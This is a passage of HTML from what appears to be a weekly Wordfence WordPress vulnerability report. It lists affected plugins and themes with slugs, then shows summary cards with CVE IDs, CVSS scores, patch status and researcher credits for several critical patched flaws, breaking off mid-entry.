			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/participants-database" target="_blank" rel="noopener">participants-database</a>
		</td>
</tr>
<tr>
<td>Payment Gateway for PayPal on WooCommerce</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/woo-paypal-gateway" target="_blank" rel="noopener">woo-paypal-gateway</a>
		</td>
</tr>
<tr>
<td>Payment Plugins for Stripe WooCommerce</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/woo-stripe-payment" target="_blank" rel="noopener">woo-stripe-payment</a>
		</td>
</tr>
<tr>
<td>PayU India</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/payu-india" target="_blank" rel="noopener">payu-india</a>
		</td>
</tr>
<tr>
<td>PeproDev Ultimate Invoice</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/pepro-ultimate-invoice" target="_blank" rel="noopener">pepro-ultimate-invoice</a>
		</td>
</tr>
<tr>
<td>Photo Block – A Modern Image Block With Lightbox and Caption Support</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/photo-block" target="_blank" rel="noopener">photo-block</a>
		</td>
</tr>
<tr>
<td>Photo Gallery – GT3 Image Gallery &amp; Gutenberg Block Gallery</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/gt3-photo-video-gallery" target="_blank" rel="noopener">gt3-photo-video-gallery</a>
		</td>
</tr>
<tr>
<td>Photo Gallery – Responsive Image Galleries by Supsystic</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/gallery-by-supsystic" target="_blank" rel="noopener">gallery-by-supsystic</a>
		</td>
</tr>
<tr>
<td>Picture Gallery – Frontend Image Uploads, AJAX Photo List</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/picture-gallery" target="_blank" rel="noopener">picture-gallery</a>
		</td>
</tr>
<tr>
<td>PiWeb Product Enquiry or product catalog for WooCommerce</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/enquiry-quotation-for-woocommerce" target="_blank" rel="noopener">enquiry-quotation-for-woocommerce</a>
		</td>
</tr>
<tr>
<td>Polylang</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/polylang" target="_blank" rel="noopener">polylang</a>
		</td>
</tr>
<tr>
<td>Popup for CF7 with Sweet Alert</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/cf7-sweet-alert-popup" target="_blank" rel="noopener">cf7-sweet-alert-popup</a>
		</td>
</tr>
<tr>
<td>Post Grid Gutenberg Blocks – PostX</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/ultimate-post" target="_blank" rel="noopener">ultimate-post</a>
		</td>
</tr>
<tr>
<td>Post My CF7 Form</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/post-my-contact-form-7" target="_blank" rel="noopener">post-my-contact-form-7</a>
		</td>
</tr>
<tr>
<td>Premium Packages – Sell Digital Products Securely</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wpdm-premium-packages" target="_blank" rel="noopener">wpdm-premium-packages</a>
		</td>
</tr>
<tr>
<td>Product Designer for WooCommerce WordPress | Lumise</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/lumise" target="_blank" rel="noopener">lumise</a>
		</td>
</tr>
<tr>
<td>Product Feed Manager For WooCommerce – Sell on 200+ Online Marketplaces</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/best-woocommerce-feed" target="_blank" rel="noopener">best-woocommerce-feed</a>
		</td>
</tr>
<tr>
<td>Product Slider, Product Grid, Product Masonry</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/woocommerce-products-slider" target="_blank" rel="noopener">woocommerce-products-slider</a>
		</td>
</tr>
<tr>
<td>Qubely – Advanced Gutenberg Blocks</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/qubely" target="_blank" rel="noopener">qubely</a>
		</td>
</tr>
<tr>
<td>Query Wrangler</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/query-wrangler" target="_blank" rel="noopener">query-wrangler</a>
		</td>
</tr>
<tr>
<td>QuickCal</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/quickcal" target="_blank" rel="noopener">quickcal</a>
		</td>
</tr>
<tr>
<td>Quiz and Survey Master (QSM) – Quiz Maker &amp; Survey Maker</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/quiz-master-next" target="_blank" rel="noopener">quiz-master-next</a>
		</td>
</tr>
<tr>
<td>Real Estate Manager Pro</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/real-estate-manager-pro" target="_blank" rel="noopener">real-estate-manager-pro</a>
		</td>
</tr>
<tr>
<td>Really Simple CSV Importer</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/really-simple-csv-importer" target="_blank" rel="noopener">really-simple-csv-importer</a>
		</td>
</tr>
<tr>
<td>Registrations for the Events Calendar – Event Registration Plugin</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/registrations-for-the-events-calendar" target="_blank" rel="noopener">registrations-for-the-events-calendar</a>
		</td>
</tr>
<tr>
<td>Relevanssi Light</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/relevanssi-light" target="_blank" rel="noopener">relevanssi-light</a>
		</td>
</tr>
<tr>
<td>reviewer</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/reviewer" target="_blank" rel="noopener">reviewer</a>
		</td>
</tr>
<tr>
<td>Rich Showcase for Google Reviews</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/widget-google-reviews" target="_blank" rel="noopener">widget-google-reviews</a>
		</td>
</tr>
<tr>
<td>rtMedia for WordPress, BuddyPress and bbPress</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/buddypress-media" target="_blank" rel="noopener">buddypress-media</a>
		</td>
</tr>
<tr>
<td>SAML Single Sign On – SSO Login</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/miniorange-saml-20-single-sign-on-2" target="_blank" rel="noopener">miniorange-saml-20-single-sign-on</a>
		</td>
</tr>
<tr>
<td>Sender – Newsletter, SMS and Email Marketing Automation for WooCommerce</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/sender-net-automated-emails" target="_blank" rel="noopener">sender-net-automated-emails</a>
		</td>
</tr>
<tr>
<td>Shiptastic for WooCommerce</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/shiptastic-for-woocommerce" target="_blank" rel="noopener">shiptastic-for-woocommerce</a>
		</td>
</tr>
<tr>
<td>ShipTime: Discount Shipping</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/shiptime-discount-shipping" target="_blank" rel="noopener">shiptime-discount-shipping</a>
		</td>
</tr>
<tr>
<td>Slider Pro</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/sliderpro" target="_blank" rel="noopener">sliderpro</a>
		</td>
</tr>
<tr>
<td>Smart Manager – Advanced WooCommerce Bulk Edit &amp; Inventory Management</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/smart-manager-for-wp-e-commerce" target="_blank" rel="noopener">smart-manager-for-wp-e-commerce</a>
		</td>
</tr>
<tr>
<td>Smart SEO Tool – SEO优化插件</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/smart-seo-tool" target="_blank" rel="noopener">smart-seo-tool</a>
		</td>
</tr>
<tr>
<td>SMS Alert – SMS &amp; OTP for WooCommerce, Order Notifications &amp; Abandoned Cart Recovery</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/sms-alert" target="_blank" rel="noopener">sms-alert</a>
		</td>
</tr>
<tr>
<td>Spectra Legacy – Gutenberg Blocks</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/ultimate-addons-for-gutenberg" target="_blank" rel="noopener">ultimate-addons-for-gutenberg</a>
		</td>
</tr>
<tr>
<td>Style Kits for Elementor</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/analogwp-templates" target="_blank" rel="noopener">analogwp-templates</a>
		</td>
</tr>
<tr>
<td>SUMO Reward Points for WooCommerce</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/rewardsystem" target="_blank" rel="noopener">rewardsystem</a>
		</td>
</tr>
<tr>
<td>Sunshine Photo Cart – Client Photo Gallery &amp; Photo Proofing for Photographers</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/sunshine-photo-cart" target="_blank" rel="noopener">sunshine-photo-cart</a>
		</td>
</tr>
<tr>
<td>SureDash – Community, Courses &amp; Member Dashboard</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/suredash" target="_blank" rel="noopener">suredash</a>
		</td>
</tr>
<tr>
<td>Tabs Responsive – With WooCommerce Product Tabs Extension</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/tabs-responsive" target="_blank" rel="noopener">tabs-responsive</a>
		</td>
</tr>
<tr>
<td>TemplateSpare – 1000+ WordPress Starter Templates &amp; Full Site Migration Tool | 1-Click Import/Export &amp; No-Code Builder</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/templatespare" target="_blank" rel="noopener">templatespare</a>
		</td>
</tr>
<tr>
<td>Thrive Quiz Builder</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/thrive-quiz-builder" target="_blank" rel="noopener">thrive-quiz-builder</a>
		</td>
</tr>
<tr>
<td>Thrive Themes – Product Manager</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/thrive-product-manager" target="_blank" rel="noopener">thrive-product-manager</a>
		</td>
</tr>
<tr>
<td>Tickera – Sell Tickets &amp; Manage Events</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/tickera-event-ticketing-system" target="_blank" rel="noopener">tickera-event-ticketing-system</a>
		</td>
</tr>
<tr>
<td>TinyMCE Templates</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/tinymce-templates" target="_blank" rel="noopener">tinymce-templates</a>
		</td>
</tr>
<tr>
<td>Tonda Core</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/tonda-core" target="_blank" rel="noopener">tonda-core</a>
		</td>
</tr>
<tr>
<td>Tutor LMS Elementor Addons</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/tutor-lms-elementor-addons" target="_blank" rel="noopener">tutor-lms-elementor-addons</a>
		</td>
</tr>
<tr>
<td>Ultimate Addons for Elementor</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/header-footer-elementor" target="_blank" rel="noopener">header-footer-elementor</a>
		</td>
</tr>
<tr>
<td>Ultimate Store Kit – Addon For WooCommerce, EDD and Elementor</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/ultimate-store-kit" target="_blank" rel="noopener">ultimate-store-kit</a>
		</td>
</tr>
<tr>
<td>Uncanny Automator – Easy Automation, Integration, Webhooks &amp; Workflow Builder Plugin</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/uncanny-automator" target="_blank" rel="noopener">uncanny-automator</a>
		</td>
</tr>
<tr>
<td>Video Player for YouTube – embed videos your visitors will love to watch</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/yt-player" target="_blank" rel="noopener">yt-player</a>
		</td>
</tr>
<tr>
<td>VikBooking Hotel Booking Engine &amp; PMS</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/vikbooking" target="_blank" rel="noopener">vikbooking</a>
		</td>
</tr>
<tr>
<td>Virtue/Ascend/Pinnacle Toolkit</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/virtue-toolkit" target="_blank" rel="noopener">virtue-toolkit</a>
		</td>
</tr>
<tr>
<td>Visual Composer Website Builder</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/visualcomposer" target="_blank" rel="noopener">visualcomposer</a>
		</td>
</tr>
<tr>
<td>Visualizer – Tables &amp; Charts Manager with Built-in AI Generator</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/visualizer" target="_blank" rel="noopener">visualizer</a>
		</td>
</tr>
<tr>
<td>WCPOS – Point of Sale (POS) plugin for WooCommerce</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/woocommerce-pos" target="_blank" rel="noopener">woocommerce-pos</a>
		</td>
</tr>
<tr>
<td>Web Push Notifications – Webpushr</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/webpushr-web-push-notifications" target="_blank" rel="noopener">webpushr-web-push-notifications</a>
		</td>
</tr>
<tr>
<td>WP Accessibility Helper (WAH)</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-accessibility-helper" target="_blank" rel="noopener">wp-accessibility-helper</a>
		</td>
</tr>
<tr>
<td>WP Activity Log</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-security-audit-log" target="_blank" rel="noopener">wp-security-audit-log</a>
		</td>
</tr>
<tr>
<td>WP BASE Booking of Appointments, Services and Events</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-base-booking-of-appointments-services-and-events" target="_blank" rel="noopener">wp-base-booking-of-appointments-services-and-events</a>
		</td>
</tr>
<tr>
<td>WP Easy Pay – Payment and Donation Form Builder for Square</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-easy-pay" target="_blank" rel="noopener">wp-easy-pay</a>
		</td>
</tr>
<tr>
<td>WP Encryption – Lifetime Free SSL Cert &amp; HTTPS, Force SSL / HTTPS Redirect, SSL Security</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-letsencrypt-ssl" target="_blank" rel="noopener">wp-letsencrypt-ssl</a>
		</td>
</tr>
<tr>
<td>WP Fast Total Search – The Power of Indexed Search</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/fulltext-search" target="_blank" rel="noopener">fulltext-search</a>
		</td>
</tr>
<tr>
<td>WP Foodbakery</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-foodbakery" target="_blank" rel="noopener">wp-foodbakery</a>
		</td>
</tr>
<tr>
<td>WP Ghost (Hide My WP Ghost) – Security &amp; Firewall</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/hide-my-wp" target="_blank" rel="noopener">hide-my-wp</a>
		</td>
</tr>
<tr>
<td>WP Go Maps – Google Map, OpenStreetMap, Leaflet Map</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-google-maps" target="_blank" rel="noopener">wp-google-maps</a>
		</td>
</tr>
<tr>
<td>WP Hotel Booking</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-hotel-booking" target="_blank" rel="noopener">wp-hotel-booking</a>
		</td>
</tr>
<tr>
<td>WP Shortcode by MyThemeShop</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-shortcode" target="_blank" rel="noopener">wp-shortcode</a>
		</td>
</tr>
<tr>
<td>WP Social Ninja – Embed Social Feeds, User Reviews &amp; Chat Widgets</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-social-reviews" target="_blank" rel="noopener">wp-social-reviews</a>
		</td>
</tr>
<tr>
<td>WP-Polls</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-polls" target="_blank" rel="noopener">wp-polls</a>
		</td>
</tr>
<tr>
<td>WPForms Pro</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wpforms" target="_blank" rel="noopener">wpforms</a>
		</td>
</tr>
<tr>
<td>WPForms – AI Form Builder for WordPress – Contact Forms, Payment Forms, Survey Form, Quiz &amp; More</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wpforms-lite" target="_blank" rel="noopener">wpforms-lite</a>
		</td>
</tr>
<tr>
<td>WPify Woo – Withdrawal, CRN/VAT, QR payments, Heureka and more for WooCommerce</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wpify-woo" target="_blank" rel="noopener">wpify-woo</a>
		</td>
</tr>
<tr>
<td>WPO365 | SEAMLESS WORDPRESS + MICROSOFT INTEGRATION (WPO365 | LOGIN)</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wpo365-login" target="_blank" rel="noopener">wpo365-login</a>
		</td>
</tr>
<tr>
<td>Yoast SEO – Advanced SEO with real-time guidance and built-in AI</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wordpress-seo" target="_blank" rel="noopener">wordpress-seo</a>
		</td>
</tr>
<tr>
<td>Ziina</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/ziina" target="_blank" rel="noopener">ziina</a>
		</td>
</tr>
<tr>
<td>ЮKassa для WooCommerce</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/yookassa" target="_blank" rel="noopener">yookassa</a>
		</td>
</tr>
<tr>
<td>افزونه حمل و نقل ووکامرس | پست پیشتاز، تیپاکس و پیک موتوری</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/persian-woocommerce-shipping" target="_blank" rel="noopener">persian-woocommerce-shipping</a>
		</td>
</tr>
<tr>
<td>افزونه پرداخت امن زرین‌پال برای ووکامرس (ZarinPal for WooCommerce)</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/zarinpal-woocommerce-payment-gateway" target="_blank" rel="noopener">zarinpal-woocommerce-payment-gateway</a>
		</td>
</tr>
<tr>
<td>افزونه پیامک ووکامرس Persian WooCommerce SMS</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/persian-woocommerce-sms" target="_blank" rel="noopener">persian-woocommerce-sms</a>
		</td>
</tr>
</table>
<hr>
<h3>WordPress Themes with Reported Vulnerabilities Last Week</h3>
</p>
<table class="wfvr-list-table software-list">
<tr>
<th class="text-center w-50">Software Name</th>
<th class="text-center">Software Slug</th>
</tr>
<tr>
<td>Civi &#8211; Job Board &amp; Freelance Marketplace WordPress Theme</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-themes/civi" target="_blank" rel="noopener">civi</a>
		</td>
</tr>
<tr>
<td>Grand Photography WordPress</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-themes/grandphotography" target="_blank" rel="noopener">grandphotography</a>
		</td>
</tr>
<tr>
<td>Manual &#8211; Documentation, Knowledge Base &amp; Education WordPress Theme</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-themes/manual" target="_blank" rel="noopener">manual</a>
		</td>
</tr>
<tr>
<td>photography</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-themes/photography-2" target="_blank" rel="noopener">photography</a>
		</td>
</tr>
<tr>
<td>TheGem</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-themes/thegem" target="_blank" rel="noopener">thegem</a>
		</td>
</tr>
<tr>
<td>Vino &#8211; A Refined Winery, Wine Bar and Vineyard WordPress Theme</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-themes/vino" target="_blank" rel="noopener">vino</a>
		</td>
</tr>
</table>
<hr>
<h3>Vulnerability Details</h3>
<p>Please note that if you run the Wordfence plugin on your WordPress site, with the scanner enabled, you should’ve already been notified if your site was affected by any of these vulnerabilities. If you’d like to receive real-time notifications whenever a vulnerability is added to the Wordfence Intelligence Vulnerability Database, <a href="https://www.wordfence.com/help/wordfence-intelligence-webhook-notifications/" target="_blank" rel="noopener">check out our Slack and HTTP Webhook Integration</a>, which is completely free to utilize.</p>
</p>
<div class="wfvr-vulnerabilities">
<div class="wfvr-vulnerability cvss-rating-critical">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/f9e2ad4b-716a-4a2d-87c0-2f351bd13884" target="_blank" rel="noopener">Customer Support Ticket System &amp; Helpdesk &lt;= 6.0.5 &#8211; Unauthenticated Code Injection via &#8216;path&#8217; Parameter</a></h4>
<div class="cvss-score-badge">9.8</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>9.8 (Critical)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-15011" target="_blank" rel="noopener noreferrer">							CVE-2026-15011						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 22, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-ticket" target="_blank" rel="noopener">Customer Support Ticket System &amp; Helpdesk</a> <span class="wfvr-software-slug">[wp-ticket]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/theviper17y" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/01dce303f1fab51371215f21992679d9.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="01dce303f1fab51371215f21992679d9"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/theviper17y" target="_blank" rel="noopener">theviper17y</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/f9e2ad4b-716a-4a2d-87c0-2f351bd13884" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-critical">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/df8326b6-a443-4f76-a755-49f89af74d7e" target="_blank" rel="noopener">Easy Form Builder by WhiteStudio &lt;= 4.0.11 &#8211; Unauthenticated Privilege Escalation to Administrator via Password Recovery REST Endpoint</a></h4>
<div class="cvss-score-badge">9.8</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>9.8 (Critical)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-13439" target="_blank" rel="noopener noreferrer">							CVE-2026-13439						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 20, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/easy-form-builder" target="_blank" rel="noopener">Easy Form Builder by WhiteStudio – Drag &amp; Drop Form Builder</a> <span class="wfvr-software-slug">[easy-form-builder]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/choigyeongmin" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/d32e1aee83333c719f420f28c6f4f12f.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="d32e1aee83333c719f420f28c6f4f12f"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/choigyeongmin" target="_blank" rel="noopener">CHOIGYEONGMIN</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/df8326b6-a443-4f76-a755-49f89af74d7e" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-critical">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/ce3ae202-1227-4247-9133-5c7284392c9f" target="_blank" rel="noopener">GoDAM &lt;= 1.12.2 &#8211; Unauthenticated Arbitrary File Upload via WPForms File Upload Field</a></h4>
<div class="cvss-score-badge">9.8</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>9.8 (Critical)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-14282" target="_blank" rel="noopener noreferrer">							CVE-2026-14282						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 22, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/godam" target="_blank" rel="noopener">GoDAM – Organize WordPress Media Library &amp; File Manager with Unlimited Folders for Images, Videos &amp; more</a> <span class="wfvr-software-slug">[godam]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/choigyeongmin" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/d32e1aee83333c719f420f28c6f4f12f.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="d32e1aee83333c719f420f28c6f4f12f"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/choigyeongmin" target="_blank" rel="noopener">CHOIGYEONGMIN</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/ce3ae202-1227-4247-9133-5c7284392c9f" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-critical">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/ce8ec66f-5efc-4354-8871-8e35ab4e51fc" target="_blank" rel="noopener">MountDev AI MCP Connector for WordPress &lt;= 1.6.1 &#8211; Unauthenticated Privilege Escalation via OAuth Authorization Endpoint</a></h4>
<div class="cvss-score-badge">9.8</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>9.8 (Critical)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-15015" target="_blank" rel="noopener noreferrer">							CVE-2026-15015						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 22, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/mountdev-ai-mcp-connector" target="_blank" rel="noopener">MountDev AI MCP Connector for WordPress</a> <span class="wfvr-software-slug">[mountdev-ai-mcp-connector]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
